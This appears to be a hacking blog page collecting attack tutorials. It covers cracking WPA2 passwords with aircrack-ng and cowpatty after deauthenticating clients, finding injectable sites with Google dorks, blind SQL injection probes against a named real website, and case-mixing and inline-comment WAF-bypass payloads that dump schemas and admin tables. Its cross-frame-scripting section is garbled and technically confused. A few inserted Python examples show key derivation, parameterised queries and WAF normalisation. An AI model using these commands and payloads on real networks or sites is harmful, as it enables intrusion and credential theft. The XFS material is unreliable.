Welcome Fellow Hacker!

Sunday, May 4, 2014

How to Hack WPA/WPA2-PSK using FERN WIFI CRACKER

Automation Using the Fern WiFi Cracker

Just so you know, I still prefer, and recommend, that you study the other methods to crack WEP as well, using airodump, aireplay, and aircrack.
Why? Because in order to be a good network security professional, you need to KNOW how this stuff works. It’s not enough to be able to click a few buttons (we call those people keyboard jockeys or tool monkeys). Understand what’s going on under the surface. WiFi hacking software comes and goes, but aircrack, airodump, and aireplay have been around for a long time. They’re all quality products, and you should know how each of these three tools works and how they can be used in conjunction with one another for a successful WiFi crack. The Fern WiFi Cracker is an example of fairly new WiFi hacking software that’s worth it.
Fern is a great WiFi cracker to use in a pinch, and it’s already included in BackTrack and Kali Linux. However, you can download Fern’s source code right here. We can use Fern to do a WiFi crack against a WEP encrypted network. Start by launching Fern from the Applications menu button at the top-left corner of the screen.
If you’re running Kali Linux:
-Select Applications -> Kali Linux -> Wireless Attacks -> Wireless Tools
If you’re running BackTrack:
-Select Applications -> Back Track -> Exploitation Tools -> Wireless Exploitation Tools -> WLAN Exploitation

Launch the Fern WiFi Cracker and Crack WEP

From the menu, click Fern-wifi-cracker to launch the tool.

You should already have your wireless card in monitor mode. If not, see my previous article first.

Click the drop-down menu at the top of Fern and select your wireless adapter from the list. Click OK on any message boxes you get. After a few moments, the message Monitor Mode Enabled on… should appear in green, as seen in the image.
Then click Scan for Access Points.
Fern will scan for WiFi networks in range, and will begin populating the WEP and WPA boxes.


Once the Fern WiFi Cracker finishes scanning for networks, you can select the network you are targeting by finding it in either the WEP section or the WPA section. In this example, I am targeting a WEP encrypted network with an SSID of Hack-WiFi.

Select your target network from the drop-down box and then click the WiFi Attack button to the right.

The Fern WiFi Cracker will now begin an automated WEP crack against the Hack-WiFi network. This may take some time, so if you need to get some coffee or take a dump, go for it. You’ll see a Please Wait… screen for a long time as Fern goes through the process. Remember, Fern is completely automated WiFi hacking software, so there is nothing left to do at this point but let Fern sniff the WiFi network, authenticate to the device, begin injecting replay traffic, and finally crack WEP.
In my case, the Fern WiFi cracker didn’t succeed until it captured about 25,000 IVs.
But finally, if everything worked as it should, you’ll get the message below:
Congratulations! Another successful audit of a wireless network! As always, be sure to confirm you can connect to the target WiFi network.

Hacking WPA/WPA2-PSK Wireless Networks using COWPATTY

As part of my series on hacking Wi-Fi, I want to demonstrate another excellent piece of hacking software for cracking WPA2-PSK passwords. In my last post, we cracked WPA2 using aircrack-ng. In this tutorial, we'll use a piece of software developed by wireless security researcher Joshua Wright called cowpatty (often stylized as coWPAtty). This app simplifies and speeds up the dictionary/hybrid attack against WPA2 passwords, so let's get to it!

Step 1: Find the Cowpatty

Cowpatty is one of the hundreds of pieces of software that are included in the BackTrack suite of software. For some reason, it was not placed in the /pentest/wireless directory, but instead was left in the /usr/local/bin directory, so let's navigate there.
  • cd /usr/local/bin
Because cowpatty is in the /usr/local/bin directory and this directory should be in your PATH, we should be able to run it from any directory in BackTrack.

Step 2: Find the Cowpatty Help Screen

To get a brief rundown of the cowpatty options, simply type:
  • cowpatty
BackTrack will show you a brief help screen. Note that cowpatty requires all of the following:
  • a word list
  • a file where the password hash has been captured
  • the SSID of the target AP

Step 3: Place the Wireless Adapter in Monitor Mode

Just as in cracking with aircrack-ng, we need to put the wireless adapter into monitor mode.
  • airmon-ng start wlan0

Step 4: Start a Capture File

Next, we need to start a capture file where the hashed password will be stored when we capture the 4-way handshake.
  • airodump-ng --bssid 00:25:9C:97:4F:48 -c 9 -w cowcrack mon0
This will start a dump on the selected AP (00:25:9C:97:4F:48), on the selected channel (-c 9), and save the hash in a file named cowcrack (airodump-ng appends a counter, so the first capture is cowcrack-01.cap).

Step 5: Capture the Handshake

Now when someone connects to the AP, we'll capture the hash, and airodump-ng will show us that it has been captured in the upper right-hand corner.

Step 6: Run the Cowpatty

Now that we have the hash of the password, we can use it with cowpatty and our wordlist to crack the hash.
  • cowpatty -f /pentest/passwords/wordlists/darkc0de.lst -r /root/cowcrack-01.cap -s Mandela2
As you can see in the screenshot above, cowpatty is generating a hash of every word in our wordlist with the SSID as a seed and comparing it to the captured hash. When the hashes match, it displays the password of the AP.

Step 7: Make Your Own Hash

Although running cowpatty can be rather simple, it can also be very slow. The password hash is hashed with SHA1 with a seed of the SSID. This means that the same password on different SSIDs will generate different hashes, which prevents us from simply using a rainbow table against all APs. Cowpatty must take the password list you provide and compute the hash with the SSID for each word. This is very CPU intensive and slow.
Cowpatty now supports using a pre-computed hash file rather than a plain-text word file, making the cracking of the WPA2-PSK password 1000x faster! Pre-computed hash files are available from the Church of WiFi; these files are generated from a 172,000-word dictionary file and the 1,000 most popular SSIDs. As useful as this is, if your SSID is not among those 1,000, the hash list really doesn't help us.
In that case, we need to generate our own hashes for our target SSID. We can do this with an application called genpmk. We can generate our hash file for the "darkc0de" wordlist and the SSID "Mandela2" by typing:
  • genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d hashes -s Mandela2

Step 8: Using Our Hash

Once we have generated our hashes for the particular SSIDs, we can then crack the password with cowpatty by typing:
  • cowpatty -d hashfile -r dumpfile -s ssid
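As an added illustration of why Step 7 holds (this is not code from the write-up, nor from cowpatty or genpmk), here is the WPA/WPA2-PSK key derivation written out by hand and cross-checked against Python's hashlib; the SSIDs are the ones used on this page and the passphrase is a constructed sample.

```python
import hashlib
import hmac

# WPA/WPA2-PSK turns the passphrase into the 256-bit Pairwise Master Key (PMK)
# with PBKDF2-HMAC-SHA1: the SSID is the salt, the iteration count is 4096
# and the output is 32 bytes (IEEE 802.11i). This PMK is what cowpatty and
# genpmk compute for every candidate word.
ITERATIONS = 4096
PMK_LEN = 32


def pbkdf2_hmac_sha1_by_hand(passphrase: bytes, salt: bytes,
                             iterations: int, dklen: int) -> bytes:
    """Textbook PBKDF2 (RFC 2898) written out so the cost is visible.
    SHA-1 gives 20 bytes per block, so a 32-byte PMK needs two blocks
    (T1 || T2, truncated), i.e. 2 * 4096 HMAC-SHA1 calls per guess."""
    out = b""
    block_index = 1
    while len(out) < dklen:
        # U1 = HMAC(passphrase, salt || INT(block_index))
        u = hmac.new(passphrase, salt + block_index.to_bytes(4, "big"),
                     hashlib.sha1).digest()
        t = bytearray(u)
        # U2 .. Uc: each is the HMAC of the previous U; T is the XOR of all of them
        for _ in range(iterations - 1):
            u = hmac.new(passphrase, u, hashlib.sha1).digest()
            for i, byte in enumerate(u):
                t[i] ^= byte
        out += bytes(t)
        block_index += 1
    return out[:dklen]


def pmk(passphrase: str, ssid: str) -> bytes:
    """Same derivation via the standard library, for cross-checking."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), ITERATIONS, PMK_LEN)


def hmac_calls_per_guess(dklen: int = PMK_LEN, iterations: int = ITERATIONS) -> int:
    """How many HMAC-SHA1 evaluations one candidate passphrase costs."""
    blocks = -(-dklen // hashlib.sha1().digest_size)   # ceiling division
    return blocks * iterations


def distinct_pmks(passphrase: str, ssids) -> int:
    """Count the different PMKs one passphrase yields across SSIDs. Every
    SSID gives a different PMK, which is why a table precomputed for the
    SSIDs in the Church of WiFi list says nothing about any other SSID."""
    return len({pmk(passphrase, s) for s in ssids})


if __name__ == "__main__":
    # Constructed sample passphrase; "Mandela2" and "Belkin276" are the SSIDs
    # used in the write-ups on this page.
    for ssid in ("Mandela2", "Belkin276"):
        print(ssid, pmk("password", ssid).hex())
    print("HMAC-SHA1 calls per guess:", hmac_calls_per_guess())
```

The per-guess cost is the same whether the table is built ahead of time with genpmk or computed on the fly; precomputation only moves the work, it does not remove it.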

How to Crack a WPA/WPA2-PSK Wireless Connection using Aircrack

When Wi-Fi was first developed in the late 1990s, Wired Equivalent Privacy was created to give wireless communications confidentiality. WEP, as it became known, proved terribly flawed and easily cracked. You can read more about that in my beginner's guide to hacking Wi-Fi.
As a replacement, most wireless access points now use Wi-Fi Protected Access II with a pre-shared key for wireless security, known as WPA2-PSK. WPA2 uses a stronger encryption algorithm, AES, that's very difficult to crack—but not impossible. My beginner's Wi-Fi hacking guide also gives more information on this.
The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.
In this tutorial from our Wi-Fi Hacking series, we'll look at using aircrack-ng and a dictionary attack on the encrypted password after grabbing it in the 4-way handshake. If you're looking for a faster way, I suggest you also check out my article on hacking WPA2-PSK passwords using coWPAtty.

Step 1: Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng

Let's start by putting our wireless adapter in monitor mode. For info on what kind of wireless adapter you should have, check out this guide. This is similar to putting a wired adapter into promiscuous mode. It allows us to see all of the wireless traffic that passes by us in the air. Let's open a terminal and type:
  • airmon-ng start wlan0
Note that airmon-ng has renamed your wlan0 adapter to mon0.

Step 2: Capture Traffic with Airodump-Ng

Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command.
This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let's do this by typing:
  • airodump-ng mon0
Note all of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen.

Step 3: Focus Airodump-Ng on One AP on One Channel

Our next step is to focus our efforts on one AP, on one channel, and capture critical data from it. We need the BSSID and channel to do this. Let's open another terminal and type:
  • airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0
  • 08:86:30:74:22:76 is the BSSID of the AP
  • -c 6 is the channel the AP is operating on
  • WPAcrack is the file you want to write to
  • mon0 is the monitoring wireless adapter
As you can see in the screenshot above, we're now focusing on capturing data from one AP with an ESSID of Belkin276 on channel 6. Belkin276 is probably a default SSID; these are prime targets for wireless hacking, as users who leave the default ESSID usually don't spend much effort securing their AP.

Step 4: Aireplay-Ng Deauth

In order to capture the encrypted password, we need to have the client authenticate against the AP. If they're already authenticated, we can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby we can grab their encrypted password in the process. Let's open another terminal and type:
  • aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0
  • 100 is the number of de-authenticate frames you want to send
  • 08:86:30:74:22:76 is the BSSID of the AP
  • mon0 is the monitoring wireless adapter

Step 5: Capture the Handshake

In the previous step, we bounced the user off their own AP, and now when they re-authenticate, airodump-ng will attempt to grab their password in the new 4-way handshake. Let's go back to our airodump-ng terminal and check to see whether or not we've been successful.
Notice in the top line to the far right, airodump-ng says "WPA handshake." This is the way it tells us we were successful in grabbing the encrypted password! That is the first step to success!

Step 6: Let's Aircrack-Ng That Password!

Now that we have the encrypted password in our file WPAcrack, we can run that file against aircrack-ng using a password file of our choice. Remember that this type of attack is only as good as your password file. I'll be using the default password list included with aircrack-ng on BackTrack, named darkc0de.
We'll now attempt to crack the password by opening another terminal and typing:
  • aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de
  • WPAcrack-01.cap is the name of the file we wrote to in the airodump-ng command
  • /pentest/passwords/wordlists/darkc0de is the absolute path to your password file

How Long Will It Take?

This process can be relatively slow and tedious. Depending upon the length of your password list, you could be waiting a few minutes to a few days. My dual core 2.8 GHz Intel processor can test a little over 500 passwords per second. That works out to about 1.8 million passwords per hour. Your results will vary.
When the password is found, it'll appear on your screen. Remember, the password file is critical. Try the default password file first and if it's not successful, advance to a larger, more complete password file such as one of these.

Stay Tuned for More Wireless Hacking Guides

Keep coming back, as I promise more advanced methods of hacking wireless in future tutorials. If you haven't seen the other Wi-Fi hacking guides yet, check them out here, particularly the ones on hacking WEP using aircrack-ng and hacking WPA2-PSK passwords using coWPAtty.
And as always, if you have questions on any of this, please ask away in the comments below.

XFS Tutorial (CROSS FRAME SCRIPTING)

XFS - Cross Frame Scripting

Definition:

A frame that is vulnerable to an attacker editing its source, and so to having its structure partially or fully broken.

Types of XFS:

  • temporary
  • permanent (rare)

Temporary:

In this type the user can only take control of his own side, with a normal redirect (it works only for the tester, and the URL stays the same).

Permanent:

In this type the vulnerability is delivered via the URL and is visible to everyone, anywhere in the world, until it is fixed.



Finding a vulnerable site:

The vulnerability revolves around sites with many iframes, so you need to choose the website wisely. Do not choose a site whose iframes are coded in pure HTML; everything else works!

Things needed:

1) Firefox

Firefox is the best browser for a hacker.

2) Tamper Data add-on

A Firefox add-on that catches GETs and POSTs, which are the most important thing in XFS.

3) A brain

Huh? You have one, right?

4) Cookie Manager/Editor add-on

Exploiting:

The formula must be:

home page --> sub link --> iframe

Let's take the "Chrome download page" as an example (just an example; no XFS exists there).

i.e.:

PHP Code:
https://www.google.com/intl/en/chrome/browser/ 

Open up Tamper Data in Firefox.

Then click Start Tamper!

Click the sub link, which will take you directly to an iframe.

Open a notepad and write down all the requests listed in Tamper Data.

Example:
PHP Code:
12x GETs

5x POSTs

Now make sure it has 1-5 POSTs and the remaining are all GETs.

Now go back in the browser and click again. This time, make sure you leave all the GETs alone, and whenever you get a POST request, edit all of its fields to:
PHP Code:
XFS

Now you need to do some minor editing of the URL to check whether it is XFS or not.

Let's try it out:

PHP Code:
x.com/thread-01/view;POST1
Result: Same as Original

x.com/thread-01/view;POST2
Result: Same as Original

x.com/thread-01/view;POST3
Result: Same as Original

x.com/thread-01/view;POST4
Result: Same as Original

x.com/thread-01/view;POST5
Result: Broken iframe, we got it!

Voila! We got it.

Now edit the cookie of that page with Cookie Manager. Set it to "POST5".

Now reload the page and see whether the result is the same or not.

It's the same. We got it right!

Now if you want to redirect, use the following code:

PHP Code:
x.com/thread-01/view;POST5;redir.php?=www.google.com

And if you want a popup, use this code:

PHP Code:
x.com/thread-01/view;POST5;alert("XFS")

Using and Creating SQL DORKS

A method of finding websites vulnerable to SQL injection is using what we call "dorks".
Dorks are search criteria for which a search engine returns results related to your dork.
The process can be a little time consuming, but the outcome will be worth it after learning how to use dorks.


For this tutorial, the search engine we'll be using is Google
Credits to those who are mentioned in this tutorial
Now I'll show you how to use dorks with the help of a video too.




Step1: Finding your dorks i.e. the criteria you'll be using
Dork List compiled by kobez-
Code:
http://pastebin.com/0FqmasC7

Dork List by Sidesipe-
Code:
http://pastebin.com/x1rtqktj

Dork List by .Newsletter'
Code:
http://pastebin.com/APxqavu9

For this tutorial, we'll be using this dork "inurl:index.php?id="


Step2: Making use of your Dorks with the help of Google

Here's what you do:
  • Go to http://www.google.com
  • Type the dork in the search bar "inurl:index.php?id=" (with or without quotes)
  • Now you'll find a whole lot of links in your results

Here's how you can speed up your process:
Your mouse should have a scroll wheel, right?
Hover over each link and click the scroll wheel so that it opens in a new tab. (Let's say you can open about 10 links at a time.)


Step3: Vulnerability approach

Now, to see whether the website is vulnerable to SQL injection or not, we simply put a quote ( ' ) at the end of the URL.
So our site will look like this
Code:
http://www.site.com/index.php?id=123'

Do the same thing with the websites you opened in your tabs and see if there's any vulnerable website.

If a website is vulnerable, it should return an error!

Note: If you can't find any vulnerability after doing some vulnerability searching with this dork, you can always browse the dork lists I've mentioned above and use any of them until you find a website vulnerable to SQL injection.

Hack Website using Blind SQL INJECTION



S0.6 - Blind SQL Injection


Let me start off by saying that blind SQL injection is very time consuming. I honestly don't think anyone would judge you if you used a tool while injecting a site using the blind method. Let's get started anyway. I found a site which I could use union based injection on, so I wouldn't have to guess the table names, which made this tutorial a lot easier to write.

First of all, we will want to find a site using dorks, mentioned earlier in this tutorial. If order by/group by isn't working for you, you could try blind (or error based; I'll make a tutorial for that soon).
When we have our site with a vulnerable parameter, we will want to test whether it is vulnerable. We can do this by adding "and 1=1" onto the end of our URL; if it loads normally, that's good. Now if we add "and 1=2" and get an error, or the page doesn't load normally, it's most likely vulnerable.


Code:
http://www.giacusa.com/news.php?newsid=126 and 1=1
< no error
Code:
http://www.giacusa.com/news.php?newsid=126 and 1=2
< doesn't load properly

It does this because you're providing either a true or a false statement. 1=1 is true. 1=2 is false. This is the method we will be using to gather information.
To find the version, we will want to use:

Code:
and substring(@@version,1,1)=VERSIONHERE

Where we have "VERSIONHERE", you will want to put the version. Most sites would use either 4 or 5. Using what I said earlier, if the version is false, it won't load correctly. If it is true, it will.

Code:
http://www.giacusa.com/news.php?newsid=126 and substring(@@version,1,1)=4
< doesn't load properly
Code:
http://www.giacusa.com/news.php?newsid=126 and substring(@@version,1,1)=5
< loads fine

So we have established that the version is 5. We will use this method of guessing to find out pretty much all the info, as we would in a union based injection.
Now to find the tables we will have to guess the names. Since union based injection works on the site I'm using as an example, I just quickly got the tables/columns that way to make the tutorial simple. But otherwise you would have to guess them. You could use common table names such as admin, user, login, etc. We will use " (SELECT 1 from TABLE limit 0,1)=1 ".

Code:
http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from test limit 0,1)=1
< page doesn't load correctly.
Code:
http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from test2 limit 0,1)=1
< page doesn't load correctly.
Code:
http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from chapters limit 0,1)=1
< page loads fine. so there is a table named chapters.

Now to find the columns from a table, we will have to use the same method. We will use " (SELECT substring(concat(1,COLUMNNAME),1,1) from TABLENAME limit 0,1)=1 ". So,

Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,test1),1,1) from chapters limit 0,1)=1
< doesn't load properly
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,test2),1,1) from chapters limit 0,1)=1
< doesn't load properly
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,category),1,1) from chapters limit 0,1)=1
< loads fine. There is a column named category.

After you have done that, here comes the really time consuming part. We will have to guess each letter of the data value, one by one, in ASCII. So "test" = "74 65 73 74" in hex. You can find an ASCII chart here - http://www.asciitable.com/. Or you can use the text > hex feature in the HackBar add-on for Firefox. Or use this - http://easycalculation.com/ascii-hex.php.

We will want to use -
Code:
ascii(substring((SELECT concat(COLUMN) from TABLE),CHARACTER NUMBER,1))>ASCII VALUE HERE

It didn't work on my site for some reason, but I'll explain it anyway. Say user = john.

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>64
should load normally, because most sites wouldn't allow "@" in the username, but it's possible. @ = 64 in ASCII. Since it loads normally, you know it is greater than 64.

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>105
will load normally, because the "j" in john = 106 in ASCII.
Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>106
will return an error, because "j" is not greater than 106; it is 106. It's like finding columns, really. So after we know it is 106 in ASCII, we write that down. 106 = j.

Now we will need to find the other letters, so we will change "1,1" to "2,1" which will move one character along.

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),2,1))>110
will load normally, because the "o" in john is greater than 110. It's 111. So

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),2,1))>111
will return an error because o is equal to 111, not greater. But since you got nothing at 110, you know it's 111. So now you have the first two characters; just keep repeating this until you get an error no matter what, and then you will know that you have the full username. After you have done that, move to a different column, such as password :). Like I said, this can be really time consuming; this is probably one of the only times I'd use a tool personally.
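Added example (not the tutorial's own code): the same boolean oracle rebuilt against a constructed in-memory SQLite schema, with the string-concatenated query that makes it possible next to the parameterised version that shuts it off. The probes are adapted to SQLite (unicode() instead of ascii(), LIMIT 1 instead of limit 0,1; there is no @@version), and the table and column names are assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the news site in the write-up: a news table
    keyed by newsid and a users table holding one row (assumed names)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (newsid INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO news VALUES (126, 'Sample story');
        INSERT INTO users VALUES (1, 'john', 'not-a-real-hash');
    """)
    return db


def vulnerable_news(db: sqlite3.Connection, newsid: str) -> list:
    """The bug: the request parameter is pasted into the SQL text, so
    'and 1=2' or a subselect becomes part of the WHERE clause."""
    return db.execute("SELECT title FROM news WHERE newsid=" + newsid).fetchall()


def safe_news(db: sqlite3.Connection, newsid: str) -> list:
    """The fix: validate the type, then bind the value as a parameter.
    The database never sees the probe as SQL, so it cannot act as an oracle."""
    try:
        ident = int(newsid)
    except ValueError:
        return []
    return db.execute("SELECT title FROM news WHERE newsid=?", (ident,)).fetchall()


def page_state(db: sqlite3.Connection, handler, newsid: str) -> str:
    """What the tester in the write-up observes: 'loads' when the row comes
    back, 'blank' when the condition was false, 'error' when the SQL broke
    (for example a guessed table that does not exist)."""
    try:
        return "loads" if handler(db, newsid) else "blank"
    except sqlite3.OperationalError:
        return "error"


# The write-up's probes, constructed for this schema and SQLite's dialect.
PROBES = {
    "baseline": "126",
    "true": "126 and 1=1",
    "false": "126 and 1=2",
    "missing table": "126 and (SELECT 1 FROM chapters LIMIT 1)=1",
    "existing table": "126 and (SELECT 1 FROM users LIMIT 1)=1",
    "first char > 105": "126 and unicode(substr((SELECT username FROM users WHERE id=1),1,1))>105",
    "first char > 106": "126 and unicode(substr((SELECT username FROM users WHERE id=1),1,1))>106",
}


def oracle_table(handler) -> dict:
    """Run every probe through one handler and return the observed states."""
    db = make_db()
    return {name: page_state(db, handler, probe) for name, probe in PROBES.items()}


if __name__ == "__main__":
    print("vulnerable:", oracle_table(vulnerable_news))
    print("fixed:     ", oracle_table(safe_news))
```

With the parameterised handler every probe except the plain id returns "blank", so the loads/blank/error signal the tutorial relies on is gone.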





Resources:

http://hashchecker.de/find.html - Sends the query to a number of MD5 checking sites; saves a lot of time.
http://timwarriner.com/software/md5brute.html - MD5 brute-forcer.
http://itsecteam.com/en/projects/project1_page2.htm - If you're a skid and can't be bothered following a simple tutorial, this is for you.
http://th3-0utl4ws.com/tools/admin-finder/ - Online admin finder.
http://pastebin.com/wsfBfegb - Admin Finder, scripted in Perl, by GlaDiaT0R. Supports PHP/CFM/HTML/ASP.
http://www.string-functions.com/string-hex.aspx - String to hexadecimal converter.

Hack Website using SQL INJECTION WAF BYPASS

Ok lets get started.

You have found your SQLi vulnerable site, you found how many columns it has (in this case 62 xD)

You do the regular command:



Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--

The website returns this error message:

[Image: tutorialmessage.jpg]

What you want to do now is use inline comments to comment out the blocked commands, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--

And now the website returns this:

[Image: tutorialnumbers.jpg]

Ok now we will try to add version(),database() and user() in one line like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,concat('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--

The website returns this:

[Image: tutorialmessage.jpg]

We now write "concat" in mixed upper- and lower-case letters, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,CoNcAt('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--

The website returns;

[Image: tutorialversion.jpg]

Now for the good part: let's try to find all the databases. Here is the regular syntax:

Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--

But with our new techniques the syntax would look like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,GrOuP_CoNcAt(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--

The website returns:

[Image: tutorialdbs.jpg]

Now we would like to get the tables:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.tables where table_schema=database()--

The website returns:

[Image: tutorialmessage.jpg]

Now you have to comment out information_schema or tables in some way, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from /*!information_schema*/.tables where table_schema=database()--

and this returns:

[Image: tutorialtables.jpg]

It's the same to get columns; you know the drill.

If you now want to dump the id column from the admin table, do it like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from admin--

Hope you learned something from my tutorial, feel free to ask if you have any questions.

REMEMBER; This is only BASIC WAF bypass, the techniques are endless
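Added example from the filtering side (not code from the write-up or from any real WAF product): a fixed-string blocklist of the kind the three tricks above slip past, next to a matcher that unwraps MySQL conditional comments, URL-decodes and lower-cases the request before matching. The sample requests are shortened, constructed versions of the payloads above.

```python
import re
import urllib.parse

# A blocklist WAF of the kind the write-up defeats: it matches fixed strings
# against the raw query string, so inline comments, case changes and
# comment-wrapped identifiers all slip past it.
NAIVE_BLOCKLIST = ("UNION SELECT", "concat(", "group_concat(",
                   "information_schema.schemata", "information_schema.tables")


def naive_waf_blocks(query: str) -> bool:
    return any(token in query for token in NAIVE_BLOCKLIST)


def normalize(query: str) -> str:
    """Undo the evasions shown above before matching: URL-decode, unwrap
    MySQL conditional comments /*!...*/ and /*!50000...*/ (MySQL executes
    what is inside them, so their payload is kept), strip ordinary
    comments, collapse whitespace and lower-case everything."""
    s = urllib.parse.unquote_plus(query)
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"\s+", " ", s)
    return s.lower()


NORMALIZED_PATTERNS = [
    re.compile(r"\bunion\b(?:\s+all)?\s+\bselect\b"),
    re.compile(r"\b(?:group_)?concat\s*\("),
    re.compile(r"\binformation_schema\b\s*\.\s*(?:schemata|tables|columns)\b"),
]


def normalized_waf_blocks(query: str) -> bool:
    s = normalize(query)
    return any(p.search(s) for p in NORMALIZED_PATTERNS)


# Constructed samples: shortened versions of the payloads in the write-up
# (fewer columns) plus one benign request that mentions "concatenation".
PLAIN = ("id=-182 UNION SELECT 1,2,3,group_concat(schema_name),5 "
         "from information_schema.schemata--")
EVASIVE = ("id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,GrOuP_CoNcAt(schema_name),5 "
           "from /*!information_schema*/.schemata--")
VERSIONED = "id=-182 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,CoNcAt(version()),4--"
BENIGN = "id=182&sort=date&q=concatenation+theory"


def verdicts(query: str) -> tuple:
    """(blocked by the naive blocklist, blocked after normalization)."""
    return naive_waf_blocks(query), normalized_waf_blocks(query)


if __name__ == "__main__":
    for name, q in [("plain", PLAIN), ("evasive", EVASIVE),
                    ("versioned", VERSIONED), ("benign", BENIGN)]:
        naive, normalized = verdicts(q)
        print(f"{name:9} naive={naive!s:5} normalized={normalized}")
```

Normalising before matching closes the three gaps shown on this page but not the "endless" others the author alludes to; a blocklist only buys time, and the query itself still has to be parameterised.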